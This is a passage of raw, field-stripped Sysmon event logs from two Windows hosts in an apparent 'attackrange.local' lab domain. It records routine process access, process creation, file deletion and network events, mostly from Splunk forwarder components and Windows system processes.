Files\SplunkUniversalForwarder\bin\splunk-admon.exe{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917607Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.841{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B3FE-605B-7E69-00000000AE01}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917606Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.839{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917605Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.839{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917604Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.839{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917603Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.839{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917602Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.839{896A638B-B5C8-6058-0500-00000000AE01}396412C:\Windows\system32\csrss.exe{896A638B-B3FE-605B-7E69-00000000AE01}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917601Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.838{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B3FE-605B-7E69-00000000AE01}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917600Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.710{896A638B-B3FE-605B-7E69-00000000AE01}5056C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000005917599Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.831{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5C83C8D562FA4076D5FD8D1AA98FB02,SHA256=113DD60FDEF58F5A901F61FD28C924B3EC0E87A8B1CB688A6935F4083A99E422,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638470Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:50.554{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C19FA0372F7434E5657F8E7F024EB34,SHA256=EA955180B938E5FC2B08E25230FD5FA193688EA8B31D9041CF6AF2FD046B7B26,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917598Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.729{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917597Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.729{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917596Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.062{896A638B-FDE5-6058-4E12-00000000AE01}38405920C:\Windows\system32\conhost.exe{896A638B-B3FE-605B-7D69-00000000AE01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917595Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.055{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1294D364ECA40276237F37667E66359A,SHA256=7F22BE33269F438CD64A6EFE963B410363A9DA35B9793510FA5311ABE494A62D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917594Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.040{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917593Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.039{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917592Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.039{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917591Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.039{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917590Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.039{896A638B-B5C8-6058-0500-00000000AE01}396356C:\Windows\system32\csrss.exe{896A638B-B3FE-605B-7D69-00000000AE01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917589Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.039{896A638B-FDE4-6058-4A12-00000000AE01}63644976C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{896A638B-B3FE-605B-7D69-00000000AE01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000005917588Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:50.031{896A638B-B3FE-605B-7D69-00000000AE01}4116C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{896A638B-B5C8-6058-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{896A638B-FDE4-6058-4A12-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000638469Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:46.490{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57253-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638468Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:50.228{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B7EEEC4B9B1A444C5C80B2D952EAD1D5,SHA256=7D882D022613322725E252CA469447A8468710F4EE226BF808EFA13A1DBCA81E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638467Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:50.227{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FEE264DF364EEB2D583631BAB90420C6,SHA256=566100E718A8B6E2DA7ED2A4137A614C77A1D443E8356FF0FECDE92BB25660C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638471Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:51.569{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC965BCB66FA02482832F397AC901B54,SHA256=6FA159897AE7437C8CFD5BA63A17118CF0FB2F92DC5CC768573A98FD1517BD78,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917644Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.729{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917643Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.729{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917642Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.404{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917641Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.404{896A638B-B8E2-6058-B102-00000000AE01}42445760C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917640Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.399{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+10a29|C:\Windows\System32\SHELL32.dll+b7690|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917639Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.399{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917638Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:51.399{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917637Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 